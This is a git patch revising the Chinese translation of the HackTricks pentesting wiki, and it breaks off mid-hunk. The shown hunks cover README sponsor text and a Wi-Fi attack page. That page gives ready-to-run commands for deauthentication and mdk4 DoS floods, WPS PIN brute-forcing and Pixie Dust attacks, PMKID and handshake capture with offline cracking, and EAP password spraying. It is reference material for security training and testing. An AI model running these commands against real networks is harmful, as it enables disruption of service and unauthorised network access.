From 85e80d2815397b68d2fadc405496088e8e380b68 Mon Sep 17 00:00:00 2001 From: Translator Date: Tue, 19 Nov 2024 12:25:18 +0000 Subject: [PATCH] Translated ['README.md', 'generic-methodologies-and-resources/pentesting --- README.md | 18 +- .../pentesting-wifi/README.md | 134 ++++++------- .../reverse-shells/msfvenom.md | 24 ++- .../linux-privilege-escalation-checklist.md | 30 +-- .../README.md | 24 +-- .../android-app-pentesting/README.md | 182 +++++++++--------- .../135-pentesting-msrpc.md | 28 +-- .../27017-27018-mongodb.md | 22 +-- .../5985-5986-pentesting-winrm.md | 28 +-- .../6000-pentesting-x11.md | 22 +-- .../6379-pentesting-redis.md | 98 +++++----- ...09-pentesting-apache-jserv-protocol-ajp.md | 24 +-- network-services-pentesting/pentesting-ntp.md | 16 +- .../README.md | 138 ++++++------- .../csrf-cross-site-request-forgery.md | 28 +-- pentesting-web/file-inclusion/README.md | 98 +++++----- pentesting-web/reset-password.md | 14 +- pentesting-web/xpath-injection.md | 22 +-- .../asreproast.md | 22 ++- 19 files changed, 490 insertions(+), 482 deletions(-) diff --git a/README.md b/README.md index aa12adbd0..6608ce5f8 100644 --- a/README.md +++ b/README.md @@ -5,7 +5,7 @@ _Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ {% hint style="success" %} -**欢迎来到这个维基,在这里你将找到我从CTF、现实生活应用、阅读研究和新闻中学到的每一个黑客技巧/技术/方法。** +**欢迎来到这个维基,在这里你将找到我从CTF、现实生活应用、阅读研究和新闻中学到的每一个黑客技巧/技术/无论是什么。** {% endhint %} 要开始,请遵循此页面,在这里你将找到**你在进行一个或多个机器的渗透测试时应该遵循的典型流程:** @@ -32,7 +32,7 @@ _Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/
-[**RootedCON**](https://www.rootedcon.com) 是**西班牙**最重要的网络安全事件之一,也是**欧洲**最重要的活动之一。这个大会的**使命是促进技术知识**,是各个学科的技术和网络安全专业人士的热闹聚会点。 +[**RootedCON**](https://www.rootedcon.com) 是**西班牙**最重要的网络安全事件之一,也是**欧洲**最重要的活动之一。这个大会的**使命是促进技术知识**,是各个学科的技术和网络安全专业人士的热烈交流点。 {% embed url="https://www.rootedcon.com/" %} @@ -65,15 +65,15 @@ _Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/ ### [HACKENPROOF](https://bit.ly/3xrrDrL) -
+
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和漏洞赏金猎人交流! * **黑客见解**:参与深入探讨黑客的刺激和挑战的内容 -* **实时黑客新闻**:通过实时新闻和见解,跟上快速变化的黑客世界 -* **最新公告**:了解即将推出的最新漏洞赏金和重要平台更新 +* **实时黑客新闻**:通过实时新闻和见解跟上快速变化的黑客世界 +* **最新公告**:了解最新的漏洞赏金发布和重要平台更新 -**加入我们,访问** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作! +**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作! *** @@ -110,9 +110,9 @@ _Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/ [**WebSec**](https://websec.nl) 是一家总部位于**阿姆斯特丹**的专业网络安全公司,帮助**保护**全球企业免受最新网络安全威胁,通过提供**进攻性安全服务**以**现代**的方式。 -WebSec是一家**一体化安全公司**,这意味着他们提供所有服务;渗透测试、**安全**审计、意识培训、网络钓鱼活动、代码审查、漏洞开发、安全专家外包等。 +WebSec是一家**一体化安全公司**,这意味着他们可以做所有事情;渗透测试、**安全**审计、意识培训、网络钓鱼活动、代码审查、漏洞开发、安全专家外包等等。 -WebSec的另一个酷点是,与行业平均水平不同,WebSec对他们的技能**非常自信**,甚至**保证最佳质量结果**,他们在网站上声明“**如果我们无法攻破它,你就不需要支付!**”。有关更多信息,请查看他们的[**网站**](https://websec.nl/en/)和[**博客**](https://websec.nl/blog/)! +WebSec的另一个酷点是,与行业平均水平不同,WebSec对他们的技能**非常自信**,以至于他们**保证最佳质量结果**,他们在网站上声明“**如果我们无法攻破它,你就不需要支付!**”。有关更多信息,请查看他们的[**网站**](https://websec.nl/en/)和[**博客**](https://websec.nl/blog/)! 除了上述内容,WebSec还是**HackTricks的坚定支持者**。 @@ -139,7 +139,7 @@ WebSec的另一个酷点是,与行业平均水平不同,WebSec对他们的 支持HackTricks * 查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或在**Twitter**上关注我们 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **加入** 💬 [**Discord小组**](https://discord.gg/hRep4RUj7f)或[**电报小组**](https://t.me/peass),或在**Twitter**上关注我们 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub库提交PR来分享黑客技巧。 diff --git a/generic-methodologies-and-resources/pentesting-wifi/README.md b/generic-methodologies-and-resources/pentesting-wifi/README.md index 327835b9b..6b72edfbd 100644 --- a/generic-methodologies-and-resources/pentesting-wifi/README.md +++ b/generic-methodologies-and-resources/pentesting-wifi/README.md @@ -1,26 +1,26 @@ # Pentesting Wifi {% hint style="success" %} -学习与实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -学习与实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +学习和实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
支持 HackTricks * 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! -* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
{% endhint %} -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! **黑客见解**\ -参与深入探讨黑客的刺激与挑战的内容 +参与深入探讨黑客的刺激和挑战的内容 **实时黑客新闻**\ 通过实时新闻和见解,跟上快速变化的黑客世界 @@ -28,7 +28,7 @@ **最新公告**\ 了解最新的漏洞赏金发布和重要平台更新 -**今天就加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作吧! +**今天就加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),开始与顶级黑客合作吧! ## Wifi 基本命令 ```bash @@ -113,7 +113,7 @@ sudo python setup.py install # Install any dependencies * **暴力破解**凭证 * **恶意双胞胎**(有或没有DoS) * **开放**恶意双胞胎 \[+ DoS] -- 有助于捕获强制门户凭证和/或执行局域网攻击 -* **WPA-PSK**恶意双胞胎 -- 如果您知道密码,对网络攻击很有用 +* **WPA-PSK**恶意双胞胎 -- 如果您知道密码,有助于网络攻击 * **WPA-MGT** -- 有助于捕获公司凭证 * **KARMA, MANA**, **Loud MANA**, **已知信标** * **+ 开放** -- 有助于捕获强制门户凭证和/或执行局域网攻击 @@ -125,7 +125,7 @@ sudo python setup.py install # Install any dependencies **来自** [**这里**:](https://null-byte.wonderhowto.com/how-to/use-mdk3-for-advanced-wi-fi-jamming-0185832/)**的描述。** -**失去认证**攻击是Wi-Fi黑客中一种常见的方法,涉及伪造“管理”帧以**强制断开设备与网络的连接**。这些未加密的数据包欺骗客户端,使其相信它们来自合法网络,从而使攻击者能够收集WPA握手以进行破解或持续干扰网络连接。这种简单的战术令人震惊,广泛使用,并对网络安全产生重大影响。 +**失去认证**攻击是Wi-Fi黑客中一种常见的方法,涉及伪造“管理”帧以**强制断开设备与网络的连接**。这些未加密的数据包欺骗客户端,使其相信它们来自合法网络,从而使攻击者能够收集WPA握手以进行破解或持续干扰网络连接。这种战术,令人震惊的简单,广泛使用,并对网络安全产生重大影响。 **使用Aireplay-ng进行失去认证** ``` @@ -139,7 +139,7 @@ aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0 ### 断开关联数据包 -**断开关联数据包**,类似于去认证数据包,是在 Wi-Fi 网络中使用的一种管理帧。这些数据包用于切断设备(如笔记本电脑或智能手机)与接入点(AP)之间的连接。断开关联和去认证之间的主要区别在于它们的使用场景。虽然 AP 发出 **去认证数据包以明确地将流氓设备从网络中移除,但断开关联数据包通常在 AP 正在关闭、重启或移动时发送,从而需要断开所有连接的节点。** +**断开关联数据包**,类似于去认证数据包,是在 Wi-Fi 网络中使用的一种管理帧。这些数据包用于切断设备(如笔记本电脑或智能手机)与接入点(AP)之间的连接。断开关联和去认证之间的主要区别在于它们的使用场景。虽然 AP 发出 **去认证数据包以明确地将流氓设备从网络中移除,断开关联数据包通常在 AP 正在关闭、重启或移动时发送,从而需要断开所有连接的节点。** **此攻击可以通过 mdk4(模式 "d")执行:** ```bash @@ -150,7 +150,7 @@ aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0 # Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F ``` -### **更多通过 mdk4 的 DOS 攻击** +### **更多由 mdk4 进行的 DOS 攻击** **在** [**这里**](https://en.kali.tools/?p=864)**.** @@ -166,7 +166,7 @@ mdk4 wlan0mon b -a -w nta -m ``` **攻击模式 a: 认证拒绝服务** -向范围内所有可访问的接入点(AP)发送认证帧可能会使这些 AP 过载,特别是在涉及多个客户端时。这种强烈的流量可能导致系统不稳定,导致一些 AP 冻结或甚至重置。 +向范围内所有可访问的接入点(AP)发送认证帧可能会使这些 AP 过载,尤其是在涉及多个客户端时。这种强烈的流量可能导致系统不稳定,导致一些 AP 冻结或甚至重置。 ```bash # -a BSSID send random data from random clients to try the DoS # -i BSSID capture and repeat pakets from authenticated clients @@ -174,13 +174,13 @@ mdk4 wlan0mon b -a -w nta -m # only -a or -i can be used mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m ``` -**ATTACK MODE p: SSID 探测和暴力破解** +**攻击模式 p: SSID 探测和暴力破解** -探测接入点 (AP) 检查 SSID 是否被正确揭示,并确认 AP 的范围。此技术与 **暴力破解隐藏 SSID**(有或没有字典)相结合,有助于识别和访问隐蔽网络。 +探测接入点 (AP) 检查 SSID 是否被正确揭示,并确认 AP 的范围。此技术与 **暴力破解隐藏 SSID**(有或没有字典)相结合,有助于识别和访问隐藏网络。 -**ATTACK MODE m: Michael 对策利用** +**攻击模式 m: Michael 对策利用** -向不同的 QoS 队列发送随机或重复的数据包可能会触发 **TKIP AP** 上的 Michael 对策,导致 AP 关闭一分钟。此方法是一种有效的 **DoS**(拒绝服务)攻击战术。 +向不同的 QoS 队列发送随机或重复的数据包可能会触发 **TKIP AP** 上的 Michael 对策,导致接入点关闭一分钟。此方法是一种有效的 **DoS**(拒绝服务)攻击战术。 ```bash # -t of a TKIP AP # -j use inteligent replay to create the DoS @@ -188,25 +188,25 @@ mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j] ``` **攻击模式 e: EAPOL 启动和注销数据包注入** -用 **EAPOL 启动帧** 轰炸接入点会创建 **虚假会话**,使接入点不堪重负并阻止合法客户端。或者,注入 **虚假 EAPOL 注销消息** 强行断开客户端,这两种方法都有效地干扰网络服务。 +用 **EAPOL 启动帧** 轰炸接入点会创建 **虚假会话**,使接入点不堪重负并阻止合法客户端。或者,注入 **虚假 EAPOL 注销消息** 强制断开客户端,这两种方法都有效地干扰网络服务。 ```bash # Use Logoff messages to kick clients mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l] ``` -**ATTACK MODE s: 对IEEE 802.11s网状网络的攻击** +**攻击模式 s:针对 IEEE 802.11s 网状网络的攻击** 对网状网络中链路管理和路由的各种攻击。 -**ATTACK MODE w: WIDS混淆** +**攻击模式 w:WIDS 混淆** -将客户端交叉连接到多个WDS节点或假冒的流氓AP可以操纵入侵检测和预防系统,造成混淆和潜在的系统滥用。 +将客户端交叉连接到多个 WDS 节点或假冒的恶意 AP 可以操纵入侵检测和预防系统,造成混淆和潜在的系统滥用。 ```bash # -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts) mkd4 -e -c [-z] ``` **攻击模式 f: 数据包模糊器** -一个具有多样化数据包源和全面数据包操作修改器的数据包模糊器。 +一个具有多样数据包源和全面数据包操作修改器的数据包模糊器。 ### **Airggedon** @@ -222,12 +222,12 @@ WPS(Wi-Fi 保护设置)简化了将设备连接到路由器的过程,提 执行此操作的主要工具有 2 个:Reaver 和 Bully。 -* **Reaver** 被设计为针对 WPS 的一种强大且实用的攻击,并已在各种接入点和 WPS 实现中进行了测试。 -* **Bully** 是 WPS 暴力破解攻击的 **新实现**,用 C 语言编写。它相较于原始的 reaver 代码有几个优点:依赖性更少,内存和 CPU 性能更好,正确处理字节序,以及更强大的选项集。 +* **Reaver** 被设计为对 WPS 进行强大且实用的攻击,并已针对各种接入点和 WPS 实现进行了测试。 +* **Bully** 是 WPS 暴力破解攻击的 **新实现**,用 C 编写。它相较于原始的 reaver 代码有几个优点:依赖性更少,内存和 CPU 性能更好,正确处理字节序,以及更强大的选项集。 -该攻击利用了 **WPS PIN 的漏洞**,特别是前四位数字的暴露和最后一位数字作为校验和的角色,简化了暴力破解攻击。然而,针对暴力破解攻击的防御措施,如 **阻止攻击者的 MAC 地址**,需要 **MAC 地址轮换** 以继续攻击。 +该攻击利用了 **WPS PIN 的漏洞**,特别是前四位数字的暴露和最后一位数字作为校验和的角色,简化了暴力破解攻击。然而,针对暴力破解攻击的防御措施,如 **阻止攻击者的 MAC 地址**,要求 **MAC 地址轮换** 以继续攻击。 -在使用 Bully 或 Reaver 等工具获取 WPS PIN 后,攻击者可以推导出 WPA/WPA2 PSK,从而确保 **持续的网络访问**。 +在使用 Bully 或 Reaver 等工具获得 WPS PIN 后,攻击者可以推导出 WPA/WPA2 PSK,从而确保 **持续的网络访问**。 ```bash reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3 @@ -237,18 +237,18 @@ bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3 这种精细的方法针对使用已知漏洞的WPS PIN: 1. **预先发现的PIN**:利用与特定制造商相关的已知PIN数据库,这些制造商已知使用统一的WPS PIN。该数据库将MAC地址的前三个八位字节与这些制造商可能的PIN相关联。 -2. **PIN生成算法**:利用ComputePIN和EasyBox等算法,根据AP的MAC地址计算WPS PIN。Arcadyan算法还需要设备ID,为PIN生成过程增加了一层。 +2. **PIN生成算法**:利用像ComputePIN和EasyBox这样的算法,根据AP的MAC地址计算WPS PIN。Arcadyan算法还需要设备ID,为PIN生成过程增加了一层。 ### WPS Pixie Dust攻击 **Dominique Bongard**发现了一些接入点(AP)在创建秘密代码(称为**nonces**(**E-S1**和**E-S2**))方面的缺陷。如果这些nonces能够被破解,破解AP的WPS PIN就变得容易。AP在一个特殊代码(哈希)中透露PIN,以证明其合法性而不是伪造(恶意)AP。这些nonces本质上是解锁存放WPS PIN的“保险箱”的“钥匙”。更多信息可以在[这里](https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-\(Offline-WPS-Attack\))找到。 -简单来说,问题在于一些AP在连接过程中没有使用足够随机的密钥来加密PIN。这使得PIN容易被从网络外部猜测(离线暴力破解攻击)。 +简单来说,问题在于一些AP在连接过程中没有使用足够随机的密钥来加密PIN。这使得PIN容易被外部网络猜测(离线暴力破解攻击)。 ```bash reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv bully wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3 ``` -如果您不想将设备切换到监控模式,或者 `reaver` 和 `bully` 有一些问题,您可以尝试 [OneShot-C](https://github.com/nikita-yfh/OneShot-C)。这个工具可以在不切换到监控模式的情况下执行 Pixie Dust 攻击。 +如果您不想将设备切换到监视模式,或者 `reaver` 和 `bully` 有一些问题,您可以尝试 [OneShot-C](https://github.com/nikita-yfh/OneShot-C)。这个工具可以在不切换到监视模式的情况下执行 Pixie Dust 攻击。 ```bash ./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37 ``` @@ -272,18 +272,18 @@ reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p '' ## **WEP** -现在已经破损且不再使用。只需知道 _**airgeddon**_ 有一个名为 "All-in-One" 的 WEP 选项来攻击这种保护。更多工具提供类似的选项。 +现在已经破损且不再使用。只需知道 _**airgeddon**_ 有一个名为 "All-in-One" 的 WEP 选项来攻击这种保护。更多工具提供类似选项。 ![](<../../.gitbook/assets/image (432).png>) *** -
+
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! **黑客见解**\ -参与深入探讨黑客的刺激和挑战的内容 +参与深入探讨黑客的刺激与挑战的内容 **实时黑客新闻**\ 通过实时新闻和见解,跟上快速变化的黑客世界 @@ -307,9 +307,9 @@ reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p '' ```bash PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA) ``` -鉴于“PMK名称”是恒定的,我们知道AP和站点的BSSID,并且`PMK`与完整的4次握手中的相同,**hashcat**可以利用这些信息来破解PSK并恢复密码短语! +鉴于“PMK 名称”是恒定的,我们知道 AP 和站点的 BSSID,并且 `PMK` 与完整的 4 次握手中的相同,**hashcat** 可以利用这些信息来破解 PSK 并恢复密码短语! -要**收集**这些信息并在本地**暴力破解**密码,您可以执行: +要**收集**这些信息并**本地暴力破解**密码,您可以执行: ```bash airmon-ng check kill airmon-ng start wlan0 @@ -322,13 +322,13 @@ hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1 ./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1 ``` 捕获的 **PMKIDs** 将显示在 **控制台** 中,并且也会 **保存** 在 \_ **/tmp/attack.pcap**\_\ -现在,将捕获的数据转换为 **hashcat/john** 格式并进行破解: +现在,将捕获的数据转换为 **hashcat/john** 格式并破解: ```bash hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt ``` -请注意,正确哈希的格式包含 **4 部分**,如:`4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838` 如果您的哈希 **仅** 包含 **3 部分**,那么它是 **无效的**(PMKID 捕获无效)。 +请注意,正确哈希的格式包含 **4 部分**,如: `4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838` 如果您的 **仅** 包含 **3 部分**,那么它是 **无效的**(PMKID 捕获无效)。 请注意,`hcxdumptool` **也捕获握手**(会出现类似这样的内容:**`MP:M1M2 RC:63258 EAPOLTIME:17091`**)。您可以使用 `cap2hccapx` **将握手** 转换为 **hashcat**/**john** 格式。 ```bash @@ -342,10 +342,10 @@ _I have noticed that some handshakes captured with this tool couldn't be cracked ### Handshake capture -对**WPA/WPA2**网络的攻击可以通过捕获**handshake**并尝试**crack**密码**offline**来执行。这个过程涉及监控特定网络和特定**channel**上的**BSSID**的通信。以下是简化的指南: +对**WPA/WPA2**网络的攻击可以通过捕获**handshake**并尝试**crack**密码**offline**来执行。这个过程涉及监控特定网络和特定**BSSID**在特定**channel**上的通信。以下是简化的指南: 1. 确定目标网络的**BSSID**、**channel**和**connected client**。 -2. 使用`airodump-ng`在指定的channel和BSSID上监控网络流量,期望捕获一个handshake。命令如下: +2. 使用`airodump-ng`在指定的channel和BSSID上监控网络流量,期望捕获一个handshake。命令将如下所示: ```bash airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap ``` @@ -353,7 +353,7 @@ airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pca ```bash aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios ``` -_注意,由于客户端被取消认证,它可能会尝试连接到不同的AP,或者在其他情况下,连接到不同的网络。_ +_请注意,由于客户端被取消认证,它可能会尝试连接到不同的AP,或者在其他情况下,连接到不同的网络。_ 一旦在 `airodump-ng` 中出现一些握手信息,这意味着握手已被捕获,您可以停止监听: @@ -377,7 +377,7 @@ tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the ``` cowpatty -r psk-01.cap -s "ESSID" -f - ``` -_如果这个工具在完成的握手之前找到一个ESSID的未完成握手,它将不会检测到有效的握手。_ +_如果这个工具在完成的握手之前找到一个ESSID的未完成握手,它将无法检测到有效的握手。_ **pyrit** ```bash @@ -393,14 +393,14 @@ pyrit -r psk-01.cap analyze 1. **EAP-GTC (通用令牌卡)**: * 此方法支持硬件令牌和一次性密码在 EAP-PEAP 中。与 MSCHAPv2 不同,它不使用对等挑战,并以明文形式将密码发送到接入点,存在降级攻击的风险。 2. **EAP-MD5 (消息摘要 5)**: -* 涉及从客户端发送密码的 MD5 哈希。由于易受字典攻击、缺乏服务器认证以及无法生成会话特定的 WEP 密钥,因此**不推荐**使用。 +* 涉及从客户端发送密码的 MD5 哈希。由于对字典攻击的脆弱性、缺乏服务器认证以及无法生成会话特定的 WEP 密钥,因此**不推荐**使用。 3. **EAP-TLS (传输层安全)**: * 利用客户端和服务器端证书进行认证,并可以动态生成基于用户和会话的 WEP 密钥以保护通信。 4. **EAP-TTLS (隧道传输层安全)**: -* 通过加密隧道提供相互认证,并提供一种方法来推导动态的、每用户、每会话的 WEP 密钥。只需要服务器端证书,客户端使用凭据。 +* 通过加密隧道提供互认证,并提供一种方法来推导动态的、每用户、每会话的 WEP 密钥。它只需要服务器端证书,客户端使用凭据。 5. **PEAP (受保护的可扩展认证协议)**: * 通过创建 TLS 隧道进行受保护的通信,功能类似于 EAP。由于隧道提供的保护,它允许在 EAP 之上使用较弱的认证协议。 -* **PEAP-MSCHAPv2**: 通常称为 PEAP,它将易受攻击的 MSCHAPv2 挑战/响应机制与保护性的 TLS 隧道结合在一起。 +* **PEAP-MSCHAPv2**: 通常称为 PEAP,它将脆弱的 MSCHAPv2 挑战/响应机制与保护性的 TLS 隧道结合在一起。 * **PEAP-EAP-TLS (或 PEAP-TLS)**: 类似于 EAP-TLS,但在交换证书之前启动 TLS 隧道,提供额外的安全层。 您可以在 [这里](https://en.wikipedia.org/wiki/Extensible\_Authentication\_Protocol) 和 [这里](https://www.intel.com/content/www/us/en/support/articles/000006999/network-and-i-o/wireless-networking.html) 找到有关这些认证方法的更多信息。 @@ -409,7 +409,7 @@ pyrit -r psk-01.cap analyze 阅读 [https://tools.ietf.org/html/rfc3748#page-27](https://tools.ietf.org/html/rfc3748#page-27),看起来如果您使用 **EAP**,**“身份”** **消息**必须**支持**,并且**用户名**将在**“响应身份”**消息中以**明文**形式发送。 -即使使用最安全的认证方法之一:**PEAP-EAP-TLS**,也可能**捕获在 EAP 协议中发送的用户名**。为此,**捕获认证通信**(在一个频道内启动 `airodump-ng`,并在同一接口中启动 `wireshark`),并通过 `eapol` 过滤数据包。\ +即使使用最安全的认证方法之一:**PEAP-EAP-TLS**,也可能**捕获在 EAP 协议中发送的用户名**。为此,**捕获认证通信**(在一个频道内启动 `airodump-ng`,并在同一接口中启动 `wireshark`)并通过 `eapol` 过滤数据包。\ 在“**响应,身份**”数据包中,客户端的**用户名**将出现。 ![](<../../.gitbook/assets/image (850).png>) @@ -421,24 +421,24 @@ pyrit -r psk-01.cap analyze * EAP-身份 = 匿名 * 在这种情况下,所有用户都使用伪名“匿名”作为他们的用户标识符。初始 RADIUS 服务器作为 EAP-PEAP 或 EAP-TTLS 服务器,负责管理 PEAP 或 TTLS 协议的服务器端。内部(受保护)认证方法可以在本地处理或委托给远程(家庭)RADIUS 服务器。 * EAP-身份 = 匿名@realm\_x -* 在这种情况下,来自不同领域的用户隐藏他们的身份,同时指示他们各自的领域。这允许初始 RADIUS 服务器将 EAP-PEAP 或 EAP-TTLS 请求代理到其家庭领域中的 RADIUS 服务器,这些服务器充当 PEAP 或 TTLS 服务器。初始 RADIUS 服务器仅作为 RADIUS 中继节点。 +* 在这种情况下,来自不同领域的用户隐藏他们的身份,同时指示他们各自的领域。这允许初始 RADIUS 服务器将 EAP-PEAP 或 EAP-TTLS 请求代理到其家庭领域中的 RADIUS 服务器,这些服务器充当 PEAP 或 TTLS 服务器。初始 RADIUS 服务器仅作为 RADIUS 中继节点运行。 * 另外,初始 RADIUS 服务器可以作为 EAP-PEAP 或 EAP-TTLS 服务器,处理受保护的认证方法或将其转发到另一服务器。此选项便于为不同领域配置不同的策略。 -在 EAP-PEAP 中,一旦在 PEAP 服务器和 PEAP 客户端之间建立了 TLS 隧道,PEAP 服务器会发起 EAP-身份请求并通过 TLS 隧道发送。客户端通过发送包含用户真实身份的 EAP-身份响应来响应第二个 EAP-身份请求。此方法有效防止了任何窃听 802.11 流量的人揭示用户的实际身份。 +在 EAP-PEAP 中,一旦在 PEAP 服务器和 PEAP 客户端之间建立了 TLS 隧道,PEAP 服务器会发起 EAP-身份请求并通过 TLS 隧道发送。客户端通过发送包含用户真实身份的 EAP-身份响应来响应第二个 EAP-身份请求。此方法有效防止任何窃听 802.11 流量的人揭示用户的实际身份。 EAP-TTLS 的程序略有不同。在 EAP-TTLS 中,客户端通常使用 PAP 或 CHAP 进行身份验证,受 TLS 隧道保护。在这种情况下,客户端在隧道建立后发送的初始 TLS 消息中包含一个用户名称属性和一个密码或 CHAP 密码属性。 -无论选择哪种协议,PEAP/TTLS 服务器在建立 TLS 隧道后都会了解用户的真实身份。真实身份可以表示为 user@realm 或简单的 user。如果 PEAP/TTLS 服务器还负责对用户进行身份验证,它现在拥有用户的身份,并继续使用 TLS 隧道保护的认证方法。或者,PEAP/TTLS 服务器可以将新的 RADIUS 请求转发到用户的家庭 RADIUS 服务器。此新的 RADIUS 请求省略了 PEAP 或 TTLS 协议层。在受保护的认证方法为 EAP 的情况下,内部 EAP 消息在没有 EAP-PEAP 或 EAP-TTLS 包装的情况下传输到家庭 RADIUS 服务器。发出的 RADIUS 消息的用户名称属性包含用户的真实身份,替换来自传入 RADIUS 请求的匿名用户名称。当受保护的认证方法为 PAP 或 CHAP(仅由 TTLS 支持)时,从 TLS 有效负载中提取的用户名称和其他认证属性在发出的 RADIUS 消息中替换,取代传入 RADIUS 请求中的匿名用户名称和 TTLS EAP 消息属性。 +无论选择哪种协议,PEAP/TTLS 服务器在建立 TLS 隧道后都会获得用户的真实身份。真实身份可以表示为 user@realm 或简单的 user。如果 PEAP/TTLS 服务器还负责对用户进行身份验证,它现在拥有用户的身份,并继续进行受 TLS 隧道保护的认证方法。或者,PEAP/TTLS 服务器可以将新的 RADIUS 请求转发到用户的家庭 RADIUS 服务器。此新的 RADIUS 请求省略了 PEAP 或 TTLS 协议层。在受保护的认证方法为 EAP 的情况下,内部 EAP 消息将被传输到家庭 RADIUS 服务器,而不带 EAP-PEAP 或 EAP-TTLS 包装。发出的 RADIUS 消息的用户名称属性包含用户的真实身份,替换来自传入 RADIUS 请求的匿名用户名称。当受保护的认证方法为 PAP 或 CHAP(仅由 TTLS 支持)时,从 TLS 有效负载中提取的用户名称和其他认证属性将替换发出的 RADIUS 消息中的匿名用户名称和传入 RADIUS 请求中的 TTLS EAP-消息属性。 有关更多信息,请查看 [https://www.interlinknetworks.com/app\_notes/eap-peap.htm](https://www.interlinknetworks.com/app\_notes/eap-peap.htm) ### EAP-暴力破解(密码喷洒) -如果预期客户端使用**用户名和密码**(请注意,在这种情况下**EAP-TLS 将无效**),那么您可以尝试获取**用户名**(见下一部分)和**密码**的**列表**,并尝试使用 [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**进行**暴力破解**访问。 +如果客户端预计使用**用户名和密码**(请注意,在这种情况下**EAP-TLS 将无效**),那么您可以尝试获取**用户名**的**列表**(见下一部分)和**密码**,并尝试使用 [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**进行**暴力破解访问。** ```bash ./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt ``` -您还可以使用 `eaphammer` 执行此攻击: +您还可以使用 `eaphammer` 进行此攻击: ```bash ./eaphammer --eap-spray \ --interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \ @@ -452,7 +452,7 @@ EAP-TTLS 的程序略有不同。在 EAP-TTLS 中,客户端通常使用 PAP * 802.11 